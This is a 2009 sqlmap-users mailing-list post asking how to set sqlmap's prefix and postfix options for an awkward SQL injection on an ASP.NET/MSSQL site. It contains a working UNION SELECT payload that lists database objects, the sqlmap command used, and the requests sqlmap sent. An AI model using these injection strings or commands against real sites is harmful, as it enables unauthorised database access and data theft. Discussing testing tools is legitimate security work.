[sqlmap-users] Sqlmap - Injection String
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] Sqlmap - Injection String
|
From: Kerem G. <ker...@gm...> - 2009-12-22 19:40:30
|
Greetings, I have been manually testing a site built with ASP.NET running MSSQL Server 2005 and identified a GET parameter vulnerable to injection. The site returns *Microsoft OLE DB Provider for ODBC Drivers error '80040e14'*through *[Microsoft][SQL Server Native Client 10.0][SQL Server]* for illegal queries. The query is a little awkward and I'm having a hard time with specifying * --prefix* and *--postfix* correctly to use sqlmap for this injection. my valid injection: http:// www.thesite.com/page.asp?p1=string*)')* union select 1,name COLLATE Latin1_General_CI_AS,3,4,5,6,7 from dbo.sysobjects *-- * The 2nd column is the only one to return output. This is what I did with sqlmap: ./sqlmap --url www.thesite.com/page.asp?p1=string -p p1 --prefix \)\'\) --postfix "--" While testing my custom query, sqlmap does the following: GET /page.asp?p1=string)') AND 967=967 -- HTTP/1.1 GET /page.asp?p1=string)') AND 967=968 -- HTTP/1.1 The query selects the options into a <select> field. Both requests are 200 OK, while both fail to select anything into the <select> field. Thus, sqlmap directly moves on to the predefined tests. Any suggestions? Kerem Gunes |
